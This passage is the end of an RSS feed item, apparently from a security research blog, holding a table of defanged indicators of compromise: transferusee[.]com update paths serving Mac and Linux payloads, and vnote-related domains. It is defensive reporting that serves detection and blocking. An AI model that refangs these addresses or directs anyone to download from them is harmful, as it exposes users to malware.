  1938. <p><strong>Links:</strong></p>
  1939. <table width="100%">
  1940. <tbody>
  1941. <tr>
  1942. <td width="100%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dns[.]transferusee[.]com</a></td>
  1943. </tr>
  1944. <tr>
  1945. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/onl/mac/</a></td>
  1946. </tr>
  1947. <tr>
  1948. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/onl/lnx/</a></td>
  1949. </tr>
  1950. <tr>
  1951. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/DPysMac64</a></td>
  1952. </tr>
  1953. <tr>
  1954. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">update[.]transferusee[.]com/DPysMacM1</a></td>
  1955. </tr>
  1956. <tr>
  1957. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote[.]info</a></td>
  1958. </tr>
  1959. <tr>
  1960. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote[.]fuwenkeji[.]cn</a></td>
  1961. </tr>
  1962. <tr>
  1963. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnotepad[.]com</a></td>
  1964. </tr>
  1965. <tr>
  1966. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vnote-1321786806[.]cos[.]ap-hongkong[.]myqcloud[.]com</a></td>
  1967. </tr>
  1968. </tbody>
  1969. </table>
  1970. ]]></content:encoded>
  1971. <wfw:commentRss></wfw:commentRss>
  1972. <slash:comments>0</slash:comments>
  1973. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1974. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1975. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1976. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1977. </item>
  1978. </channel>
  1979. </rss>